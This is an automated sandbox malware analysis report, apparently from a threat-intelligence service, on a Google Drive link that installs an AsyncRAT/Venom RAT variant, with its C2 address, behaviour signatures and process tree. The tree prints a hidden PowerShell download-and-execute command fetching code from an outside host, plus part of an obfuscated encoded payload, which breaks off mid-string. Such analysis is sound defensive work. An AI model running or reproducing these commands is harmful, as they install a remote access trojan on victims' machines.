Analysis

  • max time kernel
    240s
  • max time network
    247s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-11-2024 20:07

General

  • Target

    http://drive.google.com/open?id=1IEytWERQpW-P1OcplzPCk0KmjuAW6Ldf

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

HP Elite

C2

45.88.88.7:4675

Mutex

gbchkhrksazddij

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 2 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://drive.google.com/open?id=1IEytWERQpW-P1OcplzPCk0KmjuAW6Ldf
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3972
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9189546f8,0x7ff918954708,0x7ff918954718
      2⤵
        PID:1540
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
        2⤵
          PID:3496
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1096
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:8
          2⤵
            PID:4680
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
            2⤵
              PID:3780
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
              2⤵
                PID:2796
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
                2⤵
                  PID:4652
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
                  2⤵
                    PID:1568
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
                    2⤵
                      PID:3840
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5604 /prefetch:8
                      2⤵
                        PID:2236
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
                        2⤵
                          PID:5076
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6644 /prefetch:8
                          2⤵
                            PID:1060
                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6644 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2116
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,4779031355962351750,9256217560741686219,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6580 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4176
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Turbo Generator_Pictures & Drawing.vbs"
                            2⤵
                            • Checks computer location settings
                            PID:1936
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
                              3⤵
                              • Blocklisted process makes network request
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4560
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand  
         $ R O q F w g o A   =   2 5 1 0  
         $ S j X Q U x b X   =   ( [ M a t h ] : : S q r t ( $ Y H Y U r f O z )   *   4 4 ) . T o S t r i n g ( )  
         $ J S U S m M U Y   =   " 2 "  
         $ U b e E c Y O f   =   " S "  
         $ U d O w K f I x   =   " 6 "  
         $ z D e b n y A F   =   " V "  
         $ s O q V N X V f   =   " G "  
         $ r o O Z q I a w   =   " K "  
         $ f A e y E j h C   =   " 7 "  
         $ P Q Y s P l A g   =   " r "  
         $ O P I a F d Z G   =   " q "  
         $ m u g w H w i N   =   " l "  
         $ g R H q G y X E   =   " l "  
         $ f B n l M B Z F   =   " F "  
         $ E N e X f O N N   =   " K "  
         $ f S N F r Z B G   =   " J "  
         $ n x J F I b R D   =   " b "  
         $ O F U F Z a b Z   =   " k "  
         $ t 1   =   8 0   +   8 8  
         $ t 2   =   ( $ t 1   *   4 )   -   ( $ t 1   /   9 )  
         $ t 3   =   " 2 "   +   " S "   +   " 6 "   +   " V "   +   " G "  
         $ t 4   =   " K "   +   " 7 "   +   " r "   +   " q "   +   " l "  
         $ t 5   =   " l "   +   " F "   +   " K "   +   " J "   +   " b "   +   " k "  
         $ p   =   $ t 3   +   $ t 4   +   $ t 5  
         $ a   =   [ T e x t . E n c o d i n g ] : : U T F 8 . G e t B y t e s ( $ p )  
         $ d   =   [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( " t D b / 1 X a 0 U M u N e 3 K s Z k w A b o E h m 4 R D y Y x t + q j e E E t 7 z t 4 0 I O T w k x u f o r g M o v E P w 5 d 5 v i Z B w b s d / Y f P O 2 Y y D c C i d T A t l b W s Q x e V v O C q N D O x T x g r C + 9 F B b J G + d r K G L R d X i W h J r p W c w Z A J c 7 D 1 O X R M 3 s I H P p E E O Q g v J A j Y u Q M Z B W G N 7 x Y L W W w Q h q r 7 H c t E F n E w 5 8 n e R l e S 2 K Q / 1 9 5 o K B n L k b C t l p z 1 2 M R 5 b 6 R M Y Z r o + f 9 B E + W q 7 z G H P y 9 / C R N l 9 U S Q d 2 6 f r M Z 6 + T k R i a 5 H m g t n 9 m R S w M X J i 1 / n v b Z 0 X j s W r C + 1 H h b O v 8 D 0 5 l 6 y 8 5 X e + O 9 c 8 6 f X v W 2 3 7 C i 8 7 V G P i + G j 1 O 9 d p 9 H 1 6 0 F P G 8 0 O 7 3 l W Q K h X 6 C v Q V b p j i A M I c Y W 7 Y i b r p 1 V B h S K 2 B k D v y G + Z T 6 V b k h R 2 w d 8 Z j x B Z J C M V K 5 I 0 d b u v 7 U j R U O U 3 A 6 j 8 6 4 W L 5 + S I B z o + h G w B + V 0 b v P p j J L V T 3 O v F W V D 2 f W 0 l 4 P A F Y N W n y I d o h W k U 8 V W I 9 2 + X c S L x Y t 1 U m i 2 L n 4 c 6 G g J f E A Q 7 W 7 x b A X R q 3 e F q d k N N 4 e o G T X 8 O R H d B Y I 7 W e 2 g g E Z r I E Z V y 0 9 k 6 k 4 9 x t i C e e H x W 6 j A m 4 I v y a f 2 N M C n m S D h + i p d 6 U 6 A 8 R 8 S p M w 4 y 7 e l E H + 6 g A e f 7 Z n 3 D I q m y S q o P x N h s d 3 V s x D Z o h I + e M 5 5 k X e 4 d q f T 6 K L + I J h d v 2 j Z Z w z T S G f c m b s w 0 G g 2 b x G g G c u y v p t S O q t Q H 1 z S s i D 7 W T e U f X P 1 Y c T M 3 5 s b z W Z y t x L o w h s R E d f 5 Y X 9 W W a m V 9 1 a 9 m a Q J f s / O 9 8 r S y 2 h i n w G P 7 z F 3 d p T R S 3 + R n C + u j E d x 0 7 6 A n 9 t Q J D R r O i F y 5 k P m 4 8 T T + r Y 7 j i f W W q r f N 5 V 0 + I z u n q K 5 r 4 Y F L 4 p P J i Y Y 1 7 6 X Y G g L 1 C w J G L p w x c Z G s / C T x S / y q 0 2 n m Z D c o i g e 2 4 x J g G S X a t J e u + f N p D B E 4 e 3 j v u q U 3 G h 4 V 3 b M K 4 J 9 Q W x 6 0 d l P 2 X M z c 8 e K Q Q b / B j U e T M / w q O j o K c n Y y x 5 R z c 8 R J K B t o + M T c C G A z 8 x L 9 B 7 3 0 j T N T u I 5 L 4 9 H q p Z W W b W B t 3 m O + W 6 m R o P r d x t e n y Q l J 2 I M 1 r I C j c s / i V p 2 Z n 5 B Q C e B Y S E X B F E L + G e R l B Z p 2 J 6 h 0 e D a K j 2 9 w Q U l K U x K P 3 c n E F B Z i O 1 r D 0 h / p T 3 5 H w R j 7 w L P 8 z I 8 l c A M p h j 0 J k A 7 O z j z 1 T F A 7 T Q p Y v v c E C g J e l F D 6 F z D N 9 w f Z c A R A p s s z N i L B u L k J 7 p l n m 9 Y s C n R e Y b 1 d S R o D q r c I / l q Z k / L 5 5 h Y 8 m F e 0 / 4 Z E x G n a 1 Q y n W M k z Y u m m t a w q / f 9 z m C w 2 Q s u H 8 S F a x 8 n 9 p P W n i T 9 w I c Q t K d i S Y a W e h r n b Y F 8 n Z b I f K C j Y 4 B V E c J 8 t 4 E e R d m p O g 7 8 o 4 g t B + c K A F a E H 1 W h e R o U P O N 3 B U M / 4 3 s a 5 V n v b B F B M K I V N p e 9 E Y U r M r J r O L 6 A P W I F k 6 C K s 0 R y L b w O W D Y B z X 6 R 2 / P H + D C Q A n I C E v W x w S 9 p J 3 Q y V f V F e v T e 7 W 8 c c y P n 6 T N U 7 B g n f D O T H R v 5 u s 3 m q t t y 8 0 u q + Y v J q o X f a q l o X K a g H j Y + K z 6 j 5 q J A A N + 4 2 V B x l u i N a g m g n L o y 4 Q k A 8 F b C G x D M r W 3 2 h y N n S d h 6 9 p U 1 K C j U C 0 p q k / a V w j H m R J 3 c 9 E c e k t v I h G K f 2 q S P O y r B S W M U n 5 E O 7 E u + o R t 2 U 9 8 v F m r 5 a U l E 3 + H C L j H L q l s K / n 3 O 8 i s z f P z h r 7 l g P i F i 1 e h n 2 C r Z j 3 l n H R G D e g 9 1 a s a l b 1 M C u 3 f f I 6 X M m + 4 R 7 u B 4 F T i 7 8 8 g F h c 7 V K N n v h / 5 0 k w + 9 N b c 1 y e M + f / I w M y V U c X y m y 2 5 q 8 d R u c k e X h X 8 e y 5 J / y p k a V s r p N K 5 Z B T w u f n 9 9 q w X b z g / n y X p C a A o 6 W c 4 m Q R d S U 9 p r j q r G f j O C m v y 5 U b o C 8 0 h V a j Y c R R 1 V r P 1 M o j R 2 t 8 H I J x W L X L 1 0 F D w N B B p P w Q N X l N O R I x f F b d v y c W s P X q G d R v D z T S 5 Q m i y x H u g e k x 5 T Y p 3 p P S i I u 7 O v K W W n Z i e p N I h 6 g 0 u E w w N s h u n S L i e e 2 U o K X 7 N s I a f E E v e a 6 2 A H h P H 9 i 6 Z V H P 1 h J a P b C W h N 9 3 0 1 v M O l p K 3 n C C s S / 5 x d J n D e Z z 2 9 J w U f W 7 y A g F W u i 9 3 R v N 7 C C t A B b t E T P h 8 O X E P 6 V 4 Y d K 3 M z a t z n U A S C / P H z w Y x n 7 n H U + Q L q / f I o D H e j f V U o O 3 C g s X 6 h 8 Z n h J 0 B E c y + H s e Z M 1 Y 2 f 6 f x p p 2 t E 9 m e I j Q w q y c F y C K h T K m h c Y 8 b 8 E 6 i 6 p 7 N m R 5 J a 3 X 4 I K L 9 Q 3 i t u y m v b h K 0 b h v b r 9 b B d C M h c K E 1 A H o A C w c n H E b h q v o E o u N n m j d y 2 C t I 2 X B F m T n E a Z o b 2 j N j V + M S 7 I b b w V R w I W r a u D M U U R z 9 D o 8 0 6 e w + z 5 t V x 3 n c s M R G D K Y R L V N 2 e 7 Y c O 9 7 J f a D B a a v / r E 8 p x 2 p h 3 u J a N d S R 4 E y 8 P y g j 1 G x 0 Z L 1 R + 6 f V W h g v D k i j R k X 9 n L 1 Y K U z i K o h I 1 P u p o 2 9 + u o Z 3 v 1 X Q 4 T G a q D 5 4 q 9 h S q u Z D C S J 4 0 h i H D U L R D w d 8 D e j 3 1 j P q 6 / z s 1 e A B h 4 i Q H j o M t A H f W z h A u L y Z 5 N N R G d 6 t a Q 6 U h J S i l F v u 5 k Y q k n w w c S 7 f c b V n V m e 4 J Y 5 5 V d + p 2 d / a f R f p M A k N 5 6 G 2 Z A F q I 8 D m G T E d s C P X p p U h k 8 a 6 P V l 1 G U S u b Z b e B O O 8 M h Q Q T f g K m H h Y T W A t N C l 3 4 D x s Q s L q R d x t v 7 C V Z c B Z P b l e I x A y s 3 C 7 E 6 d o p d q t Q d W L U B n u S 8 B h h B Q A 8 A 0 7 k c p 7 k z G D x C b D x Q q y H 4 w 6 S F E 3 o v L 5 O F R L S s K F O 4 H 9 z b k C V S T i U H 8 a T t 1 1 3 F j r 5 L p V E I 2 o Z O 5 i t P p r 8 C 6 X A C 8 P m J i G + E i N c 1 J M P P h M T q n u j c O u Q i k q s r S z 2 h u l h q B g v d u X D f / 1 D Z j D G 3 G g O J d w 9 6 8 Y c 4 3 n Y / y N f h l 9 m o t r t j b d A n r q g u D j H Z F x W S F W t W x V O N S r r M p 5 u g 1 R 8 W y p 6 F W I 7 v 4 5 8 l N L g 8 t m J q S 4 o + E w e q A M + o f f z k P Q / / s S r D 3 z H u R f v 1 L I B w n C N V Q 2 R d I D 0 p 5 V S + a U J 2 e p U v Y r B m K l m v b 5 C V G i 9 E L 4 n V E o G 9 W G x e C n t X C F U k F f i b Y N a R i u 8 s o W H K q O Q b v W D m L N f K 5 F m a l T H r C A T e / E 3 9 L D / L 5 4 H J P P a d z 9 k P G z u H J 9 Y e s 4 g k m 6 i M g w O A A F p 4 L E 5 1 v 4 u C Z 9 L F X 5 G M X J a g C 9 G r A i U C 3 f s y W h D P U K 8 7 Z 1 p 0 0 T x X R E G / 4 Y b R C c 5 z K P I 0 a B V V y B c a 4 8 3 Z N Z W b n H v r b M u P B J C h p U S r c G N G r 8 t A g p f M 6 3 D 7 w F L W M M 3 0 V N m N x 2 P w E r y / Z M N n U Y n R J 3 B v Q d r A U z B + E y q e P z E l M x U h c T r t y M 4 N 8 U T i c H P 0 v K 2 / d o E p 9 r o K F T n G 2 J p L H z H n l + G / 7 g d W 5 W J t h t I D M n I 4 R E 7 b j y / e T 0 n E w x i C O k Y V p Z L q X J y W 0 W A s u g y c L v W K A Y 7 5 u E K 6 n B H M N 5 o A c 3 b X G s E Z D F A E H / G i O s 5 a c g C Z o O Y M e q I G R N L z s 0 z q H T p c J z s d M E P b 9 e x x v v P F n X D G g 3 G L e i W U d p I 6 a + P l 4 s 5 k n F q P E i 6 b 9 3 F r M W I t D B O p N v 6 A y h i x A m q T b d + 1 n j / G l 9 c E a B H I P H W S Y L I X E F v V c S 5 Z s x l m U z c Y G O R z B 6 T k 2 F X M v N j v 7 P 2 E x K 8 3 W e 1 P Z 2 k P v V f Y + 6 z f a D b r 9 K v V n t G 9 X G F v P 9 V M 3 f 5 Z e Z F M k F w t c 6 n U M T h H a P J q f E k 9 u u p + f H S C 2 8 e G k 5 4 K D m U Q q V q D G 1 I + 6 l T k C e c G M K u V 1 J e R R 1 w g G Y R j F o z R o e y r X j q c + 3 T N V C g u / 2 O 3 m 9 l 8 r F 2 o e R d I V 9 H u 6 D y 0 z c p B e C n 3 j R h D z 4 W m R 9 5 M D F 9 D y a v L f v 9 G a C A 8 H R k K H x F r r u o B q H p U v L e F 9 N 6 b g T I 8 t L T Y b 7 h O o 2 a x F P 3 P S N p W U x / I K I x j q j h v e 0 h x U I e y / 5 V 4 / E A L q y x I G e + 0 2 7 / H 1 m 9 i W 7 h 9 S H 2 + o s b w O v y a G S q P I I B 3 1 5 H U n 3 k M B P g I H h 9 G 3 F O / X J O g I e X X 9 S t g o H b k h 6 F T Z c y S W 4 Y w L 7 W c I U z h P 3 N w o E W U G r + t f j p R + N B f F V 6 D 2 2 U g B 5 0 2 S B o 9 c M L Q / q / E M S R h f c N 7 B q K y m k Y e S P Q R r t 4 T 1 W s 3 u o O n t w b 0 6 c s 8 3 P Y 4 7 P 0 x K P t e N c 2 w 4 Z x c l 8 o d H V 4 1 8 j W O w b z c w S N B x K R S P Z 5 I U c V R M b 0 L g W Q R J g 7 u d 7 b k S 9 7 K T W P O / Y 7 B o K U q P 6 U L q R e B 4 X + 5 / 9 u f h I r y a g y z 6 J D x C n P 1 Y F k u N j R o 0 v z U W h z p r u w v W 4 2 2 j L u o 8 B U O s k Q B y E u m o j Z V 2 2 V C r p h m v Z H e v 1 E 6 2 z Z + u C V H s T O E O T W 7 B x e 1 N / N E Q K G N l e E r p 9 u + J Z p w u 7 0 J Q 2 r J 4 P v K I h H T m 1 O x J N y 3 6 G E q j y e E J 9 Y u S 8 0 t o w C U M Z c c A e h 1 Z T i 7 u k p j e L s W 5 4 o F l 3 4 H 2 K D M D F 0 t N m g R N l b x B H U 0 6 4 8 m 6 X t 7 t 8 v 6 z h y E R 9 I R j Y n p r u S 7 E r s / I b f 2 e g j G 0 Z + m b U Y c I 6 y x e o Q 7 G P w V M B 2 0 / Q 4 N l f k j C D X g L p 0 D K l 2 O + m f f s f L C G R m x L 0 i g d F A a X e Z n B S G x q U K / D V R w 7 p 0 e h 4 g F C R 8 p O y i R y P 3 S M B j N f Y m d v A S U i 1 0 z 1 Z v 4 4 N j L m 3 d M d f 5 5 A u a 2 a 1 O Z c H b 9 G o P b f f W z 3 J u 5 g E T H n T q L o o T T l L A 4 X d u h W I U y l Z i G B j S t p R v O 3 b / N L r G 6 + 6 M H W u A T u J d G T j 3 / f 0 u D 1 c U k a t l s L q a n k J y d u 2 U Z E F M W 1 u G Q u E N E K X x O F / e A s / F c V T V D E W 9 a v S y 2 s p n x U X 7 I 8 a V x F j u j f F Y k n v c W M X S 4 I C W n j j t n m h j l 8 d f j p v 6 q K Y 3 L / L o B T 5 e f z i g d + i t Z i e l u r d D r y R g e L d j 3 w z N z V 7 C c g h F 3 1 p h D H W b 4 F D V X W j o f U L d D t M z p / Y h K h W P q v A 9 E z f g c m n U e j 7 / + 8 q 6 8 9 i u I f X y L 0 s 2 K 9 m v W Q V j E C i M z / O + F X / j o F D f l t y v l 0 i I z m g 1 U 9 O J s u S y j u j s c 6 e X K 9 i T h H s J 3 k N Y 3 V Q C L K 6 A 5 O i M 8 E b C o j Z y c X G R P M s g T 4 z C r k G + p n V O 6 0 k c E j C 7 r V z S d N R b + a J 7 p 1 A g + P Z Z g 6 X + 1 T m 3 A b X z e E f i L 4 B q n c Y F B g p A L V l s 4 B H v v n k Q A E h 6 t k O w F c g F H B K J 0 S u w Q d B 2 n D 0 W n I + I j I 3 A S v h y O k o + c B 1 k H 0 e t 4 f J d d K 6 1 z a p v G n X A g z l C D T l k F s Z Y I J Z l 2 M u k I S B + p Y f x W w t / V D Y K r M W S / L K m p w D e 0 + M O 1 1 M W / Y N g O y F F T L P r w x N B 3 i F b O a 0 j o 9 n p v v 7 O L Y S W I r 1 n i H y 0 F C 3 y j p h b r 8 j r a K d B x g o E D 2 O s Z S D G s k c f y H N P O O 5 c 1 7 d 0 g 8 F F X Y s Q 5 d Z h M A 9 4 K W 8 8 C C Y g A 9 I J e n O 3 L H N X K D K b 3 e L R u g C 0 L 4 x y 9 L F J T 2 / X w S p 5 M 9 e e m 7 q F 7 o R c m K c k j C I B o h w A l s v u M W 7 P K 2 T y 0 B P U 3 o H m i t o l 3 6 1 b Q F b Y k N G C R F 4 q S u T a + q 1 1 f c x 0 d H A P 4 e R J y U k 5 s a g P j O T q q v n P A o k q 2 Z U O m + v 5 e x j l u g m R P 8 x D W 9 r I 2 V k + Y 6 R A + T T W n F S K G n g g B E Z u y b f A B n Z G B 8 H r U a q u Y / n B D G 2 c Y r / R / D u Z A i n T t M D E m / N C 3 O 9 D / j R P p O r 4 / 0 r t F o n 6 q U K Y W h w x L / Z 7 e 9 k r b p U b y O t Q i i P X 3 b f t U d z 3 s W B O c Z I h Q 5 k j W g k 0 8 u M R a P Q 5 h h M 6 g q 3 M n Q G c W M T Y S X j C g o d 2 V r D D F C e c I n B v t d W s q R E U + Y 1 0 x L 8 r i j j T A i y O y j 8 A w 4 f I q + j e J k 1 0 v f x o 2 m j 8 Z 3 b T I v y L 0 L 2 Q 0 W z Z X k 9 i w G f L T r K 0 J H F P v D s L 6 b E r N k 5 8 8 o t 5 E 2 H t O r a 6 0 B W 7 3 9 3 / Z k v p B r k 4 q 0 u X b 7 U 2 1 1 H E X L N O X 3 e l o r k 9 X E n A X V J S 6 k j l W 2 n 7 6 W m C K x + d V L F Q U N R v X + M G K S p 3 7 G B q 4 4 N i r L 2 H o i q O + F l U u h w z 1 3 F j L 6 p w k V c i 8 s B P V b J 7 X t L 8 e D c N f g F F w N n 2 r N p C 6 V H l p M h v O c f t I X F M p w D 9 J n Q 2 n m f 4 + 0 a c + K 0 M / N L 0 N p k U / Q / u Z Q 5 l Q N d s + h U t B L I W b / g W 9 b g e P J F j a p S Z e r L y D 7 G x 7 C I d C D G k M f S h h P r n 1 i l O x J S D 6 W O x Z J 6 y g O d 8 Q 9 U m X n b R 2 + G / C d W x V G W a 1 j c t N I X 8 O Q N s o P n u R t U 3 i H K 5 e 6 P T X / u p + x X v F p 3 I U 4 d B n Q r U g i 9 i k n e J a 7 a o p P F 6 X x W B 0 G F L p X d H a 7 a b O W 4 b s w 8 P X x y k o z E M m n t R N y s H b n j Z p p 1 F r V y b Z h g P c t 5 d i b 4 A h 4 j n n D 0 h o b k i 6 7 j 3 S k G Y D 9 d M J L 7 8 R j / M e a 0 t e H A 4 r s 3 Z 3 s / u + N K K r V 7 A A c x 5 X H D U Z S / Q y 6 K V r r l f L r p y a M 1 B M Q o 2 D 5 H I H s 4 3 6 e 6 Q a i 1 4 5 W J A 8 x L l W k E L G / 4 F t H Y J W r d Y v 6 7 I 4 4 L 9 d S 8 s 6 x r G X 6 M N v S q N 6 O F H Q B w P 4 k j 2 S e i R b Y i P h 9 g R b z i z V q Y Z c J q 3 V h z F h y y 6 6 Q n C B Q o f M A Q C j R M N c b v 6 d T P D J v j k p 1 g U 8 6 G l V U 5 T u 6 N N l 8 z G w T b i e H M I / R W e Z M h k i m n F N o o B B P 6 a y B K y v g C M d d M R I S w i G A U F y O 8 e A C p X i C 4 d Z E 3 d X 7 P a S q d u 3 3 U + H 4 8 K K E l Y N J A 1 8 e E h E 6 e h c x J y K 4 l J 9 3 R A b f O g V I w j X M v J v g e b b z 0 W P F k v y 7 v o 8 w l R s U W 4 1 V O q 6 s h G t P 2 R O l g 7 3 R 9 N D V 9 W t m + n P g o b r z j 2 G I O G k e T a f R l U F a + 3 o 5 A 8 K 1 L + a n 0 r A K A M j G l H j E s F s D J k F D s 7 a A D l C X l K 2 I Z O H K a d o B 3 o S D 6 B R l Y f q 3 L R / 4 a 8 C 4 a D U Y N 0 S l v q e d w k z m 1 C 4 z l o Z I j R 6 t g I S V y Y m + t y E C Q I M X e b H R G a V N x K / x 7 5 k D 9 S o H u S / V H K C J Y b d F 1 5 z e l I x d U z b o r m 8 5 3 R 0 Q A L d b 7 6 / r 1 o E x y J E B h W 8 2 D p O i 9 q / c q d n / d u D n j T 6 C s W 7 u X R b W H Z o x D s a 4 o A C H K s k W h 2 f a u R H g M U l R 5 W s / / s 2 Q R B i 7 K v w a E F R L 5 Q n s K T d D a q 7 v f v T R 0 J M 7 2 5 t v e W P A D D h I A V 5 + A z r y D l 5 W z L N y x c F N r A L 8 t A H Z R 7 S + x s z j I M Q a S t J 2 v O L 8 0 X 0 5 i 8 n N W X r / Q u 4 u 3 7 z L Q n a 9 L B e O 0 H J m g I x v k H 6 6 R X 5 B L L e q 3 Y E a Y p X U + V B 2 W K J O E P M 9 b